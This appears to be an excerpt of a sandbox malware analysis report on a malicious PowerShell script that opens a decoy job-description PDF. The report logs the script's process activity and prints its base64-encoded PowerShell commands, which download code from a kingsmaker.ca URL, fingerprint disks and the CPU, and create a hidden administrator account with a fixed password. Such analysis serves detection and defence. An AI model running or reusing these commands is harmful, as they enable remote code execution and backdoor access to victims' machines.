        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF848F4779624_2_00007FF848F47796
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FF848F2BB6928_2_00007FF848F2BB69
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\svczHost.exe 41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
        Source: svczHost.exe.11.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3675
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3628
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3675Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3628Jump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: amsi64_7368.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7120, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.expl.evad.winPS1@47/81@4/5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4164:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2624:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:984:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrlxps0q.2w1.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: kingsmaker_4.ca.ps1ReversingLabs: Detection: 15%
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES421C.tmp" "c:\Users\user\AppData\Local\Temp\pkwqtvat\CSC14ED126C80BF4A239EEB93A187C6F14.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1720,i,11727097951679054640,6860338187584795454,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkA